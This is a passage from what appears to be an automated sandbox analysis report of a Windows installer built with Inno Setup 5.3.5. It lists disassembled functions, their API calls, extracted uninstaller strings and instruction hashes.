                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 28630f636b04da4fcdbc8bf603e3cd822730a77496e846d3c01d6dea91b4df37
                                                                                      • Instruction ID: 68591aebe15be66c02bfe18b1190825c6ab69d9b7e21385b208dddf45066949f
                                                                                      • Opcode Fuzzy Hash: 28630f636b04da4fcdbc8bf603e3cd822730a77496e846d3c01d6dea91b4df37
                                                                                      • Instruction Fuzzy Hash: 6D21DB315047086EDB11EB65CC41ADEBBACDB49714F5484F7BC08D35E3E6389E4C895A
                                                                                      Function 0042414C Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 00424154
                                                                                      • SetActiveWindow.USER32(?,?,?,00468BB4), ref: 00424161
                                                                                        • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                                        • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,023125AC,0042417A,?,?,?,00468BB4), ref: 00423ABF
                                                                                      • SetFocus.USER32(00000000,?,?,?,00468BB4), ref: 0042418E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ActiveFocusIconicShow
                                                                                      • String ID:
                                                                                      • API String ID: 649377781-0
                                                                                      • Opcode ID: bf39fc93c20dd362814a915e3816c2be519e9f0d9e4d58152530bfc1c9f789b4
                                                                                      • Instruction ID: 4136aac35a779e4733478972a6ab5bc4469f39141bd8f2cff661810d574da02b
                                                                                      • Opcode Fuzzy Hash: bf39fc93c20dd362814a915e3816c2be519e9f0d9e4d58152530bfc1c9f789b4
                                                                                      • Instruction Fuzzy Hash: 3EF03A717001208BDB40AFAA98C4B9633A8AF48304B55017BBD09EF34BCA7CDC5187A8
                                                                                      Function 00417C3E Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 00417C7F
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Placement$Iconic
                                                                                      • String ID:
                                                                                      • API String ID: 568898626-0
                                                                                      • Opcode ID: b8fbe12c44fb062a6cac749eb6b5fd61645d1f9f5889301bfb76636b936bc9d1
                                                                                      • Instruction ID: f0313cfea0d4087130c3a657ee055cc65a4736f61d4b278e94d42609036002a6
                                                                                      • Opcode Fuzzy Hash: b8fbe12c44fb062a6cac749eb6b5fd61645d1f9f5889301bfb76636b936bc9d1
                                                                                      • Instruction Fuzzy Hash: 31015A31204104ABDF10EE6A98C5EEA73A8AF44324F114166FD08CF342E638EC8086A8
                                                                                      Function 00417508 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CaptureIconic
                                                                                      • String ID:
                                                                                      • API String ID: 2277910766-0
                                                                                      • Opcode ID: af1c5b43412e2fcaa88ec6dbe6a8b705b794b180b560b7f19973f3177c796014
                                                                                      • Instruction ID: 516534a0d685a41b5289b303ed97122a4deaa6af678778b669afb1f0a2bf06d6
                                                                                      • Opcode Fuzzy Hash: af1c5b43412e2fcaa88ec6dbe6a8b705b794b180b560b7f19973f3177c796014
                                                                                      • Instruction Fuzzy Hash: 80F04471B04602A7DB20E72EC8C5AA762F69F44394B54443FF415C7B96EA7CDCC48758
                                                                                      Function 00424104 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 0042410B
                                                                                        • Part of subcall function 004239F4: EnumWindows.USER32(0042398C), ref: 00423A18
                                                                                        • Part of subcall function 004239F4: GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                                        • Part of subcall function 004239F4: GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                                        • Part of subcall function 004239F4: SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                                      • SetActiveWindow.USER32(?,?,?,00423CE3,00000000,004240CC), ref: 0042411F
                                                                                        • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2671590913-0
                                                                                      • Opcode ID: 42e4936c4a6647b65b5ab24117e0ac4ae5d8008d356746b3415a205c164669c5
                                                                                      • Instruction ID: b8e4b42960b6b3797255afb6d30997fccd36cf0c86298b6f3b138aeb4614201e
                                                                                      • Opcode Fuzzy Hash: 42e4936c4a6647b65b5ab24117e0ac4ae5d8008d356746b3415a205c164669c5
                                                                                      • Instruction Fuzzy Hash: 76E0E5A0300100C7EB00AFAAD8C9B9672A9BB48304F5501BABC08CF24BD6B8C8948724
                                                                                      Function 00412548 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00412745), ref: 00412733
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NtdllProc_Window
                                                                                      • String ID:
                                                                                      • API String ID: 4255912815-0
                                                                                      • Opcode ID: ccb3f07b2fee23e1b7d0b9fe211690240d667b5ade3c407fcf90e85793529408
                                                                                      • Instruction ID: 7676943622bfa1b87a175b7a8473920ed7b4936c8d574fb73453cf2521b2b913
                                                                                      • Opcode Fuzzy Hash: ccb3f07b2fee23e1b7d0b9fe211690240d667b5ade3c407fcf90e85793529408
                                                                                      • Instruction Fuzzy Hash: 5751D3356042059FC710DF5AD681A9BF3E5FF98304B3582ABE814C73A5D6B8AD92874C
                                                                                      Function 00473F28 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00474076
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NtdllProc_Window
                                                                                      • String ID:
                                                                                      • API String ID: 4255912815-0
                                                                                      • Opcode ID: 25d2fed37fc004c0ef9d7e1e532679906a7dfcc26d9c4c4e0f977566c6f286e0
                                                                                      • Instruction ID: 893271b3bcd24fcb62a5a78660203d6d155b33e0871f9808868e069105ad9bad
                                                                                      • Opcode Fuzzy Hash: 25d2fed37fc004c0ef9d7e1e532679906a7dfcc26d9c4c4e0f977566c6f286e0
                                                                                      • Instruction Fuzzy Hash: E8415779A04144DFCB10CF99C2808AAB7F9EB88311B25C592E94CDB745D339EE41EB98
                                                                                      Function 0045B918 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045B923
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptFour
                                                                                      • String ID:
                                                                                      • API String ID: 2153018856-0
                                                                                      • Opcode ID: 2fd5046d53dc597d3e4d98d458f148574003c2ec4f4f0757a2eee833ca150b3b
                                                                                      • Instruction ID: 2225761bf594105b04891f9a979b45a9a4731abcd3a6ed3030aefe2a2354edc5
                                                                                      • Opcode Fuzzy Hash: 2fd5046d53dc597d3e4d98d458f148574003c2ec4f4f0757a2eee833ca150b3b
                                                                                      • Instruction Fuzzy Hash: C7C09BF601420CBF65005795ECC9CB7F75CE6586647408126F6044210195716C108674
                                                                                      Function 0045B930 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046994F), ref: 0045B936
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptFour
                                                                                      • String ID:
                                                                                      • API String ID: 2153018856-0
                                                                                      • Opcode ID: c27a93e1bdfdde7edc9fcc879cc72405f18f208b3af26568a1f388ef4ce3250e
                                                                                      • Instruction ID: 96b9a57d22d70392ad1d1cde2f2ee6f5b4e57433d8ae25836dc8224d98b85447
                                                                                      • Opcode Fuzzy Hash: c27a93e1bdfdde7edc9fcc879cc72405f18f208b3af26568a1f388ef4ce3250e
                                                                                      • Instruction Fuzzy Hash: A7A002B0A94300BAFD2157605D0EF67262C97D0F15F2084657201A91D085A46400C63C
                                                                                      Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3270198232.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3270179742.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3270219448.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_10000000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                      • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                      • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                      • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                      Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3270198232.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3270179742.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3270219448.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_10000000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                      • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                      • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 004565B8 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 237filesynchronizationprocessCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateMutexA.KERNEL32(00494AA4,00000001,00000000,00000000,004568ED,?,?,?,00000001,?,00456B07,00000000,00456B1D,?,00000000,00496628), ref: 00456605
                                                                                      • CreateFileMappingA.KERNEL32(000000FF,00494AA4,00000004,00000000,00002018,00000000), ref: 0045663D
                                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,004568C3,?,00494AA4,00000001,00000000,00000000,004568ED,?,?,?), ref: 00456664
                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456771
                                                                                      • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,004568C3,?,00494AA4,00000001,00000000,00000000,004568ED), ref: 004566C9
                                                                                        • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
                                                                                      • CloseHandle.KERNEL32(00456B07,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456788
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00456B07,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004567C1
                                                                                      • GetLastError.KERNEL32(00000000,000000FF,00456B07,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004567D3
                                                                                      • UnmapViewOfFile.KERNEL32(00000000,004568CA,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004568A5
                                                                                      • CloseHandle.KERNEL32(00000000,004568CA,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004568B4
                                                                                      • CloseHandle.KERNEL32(00000000,004568CA,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004568BD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                      • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                      • API String ID: 4012871263-351310198
                                                                                      • Opcode ID: 2d7d41f1dc95c0e97e8351de386188b607b902f05f624e0ced809bd65a677759
                                                                                      • Instruction ID: 980461e75233d27168dbefb0458f3d7e1823a55311cdbdb2a0391f25a35d7111
                                                                                      • Opcode Fuzzy Hash: 2d7d41f1dc95c0e97e8351de386188b607b902f05f624e0ced809bd65a677759
                                                                                      • Instruction Fuzzy Hash: 32918170E002159FDB10EBA9C845B9EB7B4EF48305F91856BF914EB382DB789908CF59
                                                                                      Function 0041F088 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                                      • SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                                      • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                                      • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                                      • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                                      • FreeLibrary.KERNEL32(00000001,?,00418F60,00000000,?,?,?,00000001), ref: 0041F1DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                      • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                      • API String ID: 2323315520-3614243559
                                                                                      • Opcode ID: 3ee75083f87a6e9960b975f8ce9b4bab73ebc8e6f4ff35a6c1ea5a687f8926a0
                                                                                      • Instruction ID: da08133687b7634b50b6c6a847516dd753fa1eb4508864759417a9d87976edef
                                                                                      • Opcode Fuzzy Hash: 3ee75083f87a6e9960b975f8ce9b4bab73ebc8e6f4ff35a6c1ea5a687f8926a0
                                                                                      • Instruction Fuzzy Hash: 3531F0B1640740EBDB00EBF5EC86E653654F768B28756093BB608DB162D77D488ACB1C
                                                                                      Function 004917C0 Relevance: 35.5, APIs: 3, Strings: 17, Instructions: 495COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Will restart because UninstallNeedRestart returned True., xrefs: 00491D80
                                                                                      • InitializeUninstall, xrefs: 00491BF0
                                                                                      • Install was done in 64-bit mode but not running 64-bit Windows now, xrefs: 00491AAB
                                                                                      • Need to restart Windows? %s, xrefs: 00491DD1
                                                                                      • Cannot find utCompiledCode record for this version of the uninstaller, xrefs: 00491A36
                                                                                      • utCompiledCode[1] is invalid, xrefs: 00491A71
                                                                                      • Removed all? %s, xrefs: 00491CFA
                                                                                      • Setup version: Inno Setup version 5.3.5 (a), xrefs: 00491898
                                                                                      • InitializeUninstall returned False; aborting., xrefs: 00491C28
                                                                                      • Uninstall, xrefs: 0049184B
                                                                                      • Uninstall command line: , xrefs: 004918E8
                                                                                      • UninstallNeedRestart, xrefs: 00491D30, 00491D69
                                                                                      • Will not restart Windows automatically., xrefs: 00491EA4
                                                                                      • Uninstall DAT: , xrefs: 004918C5
                                                                                      • Original Uninstall EXE: , xrefs: 004918A2
                                                                                      • DeinitializeUninstall, xrefs: 00491F3A
                                                                                      • Not calling UninstallNeedRestart because a restart has already been deemed necessary., xrefs: 00491DAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$Show
                                                                                      • String ID: Cannot find utCompiledCode record for this version of the uninstaller$DeinitializeUninstall$InitializeUninstall$InitializeUninstall returned False; aborting.$Install was done in 64-bit mode but not running 64-bit Windows now$Need to restart Windows? %s$Not calling UninstallNeedRestart because a restart has already been deemed necessary.$Original Uninstall EXE: $Removed all? %s$Setup version: Inno Setup version 5.3.5 (a)$Uninstall$Uninstall DAT: $Uninstall command line: $UninstallNeedRestart$Will not restart Windows automatically.$Will restart because UninstallNeedRestart returned True.$utCompiledCode[1] is invalid
                                                                                      • API String ID: 3609083571-1972832509
                                                                                      • Opcode ID: 564fb5d3747994d23ef970b5a2b0d3f85f6acd01b6bbcc9d08c4d2da2b19c3a8
                                                                                      • Instruction ID: 6596ef0c965ed04d70404abd425b2fb86aee653cd75455762a8c83b1d9d07689
                                                                                      • Opcode Fuzzy Hash: 564fb5d3747994d23ef970b5a2b0d3f85f6acd01b6bbcc9d08c4d2da2b19c3a8
                                                                                      • Instruction Fuzzy Hash: CE12AC34A54245AFDF11EB65EC42B9E7FA5AB19308F10807BF800A73B2CB789845CB5D
                                                                                      Function 0041C97C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,0041A8B4,?), ref: 0041C9B0
                                                                                      • 73A14C40.GDI32(?,00000000,?,0041A8B4,?), ref: 0041C9BC
                                                                                      • 73A16180.GDI32(0041A8B4,?,00000001,00000001,00000000,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9E0
                                                                                      • 73A14C00.GDI32(?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9F0
                                                                                      • SelectObject.GDI32(0041CDAC,00000000), ref: 0041CA0B
                                                                                      • FillRect.USER32(0041CDAC,?,?), ref: 0041CA46
                                                                                      • SetTextColor.GDI32(0041CDAC,00000000), ref: 0041CA5B
                                                                                      • SetBkColor.GDI32(0041CDAC,00000000), ref: 0041CA72
                                                                                      • PatBlt.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00FF0062), ref: 0041CA88
                                                                                      • 73A14C40.GDI32(?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4), ref: 0041CA9B
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041CACC
                                                                                      • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4), ref: 0041CAE4
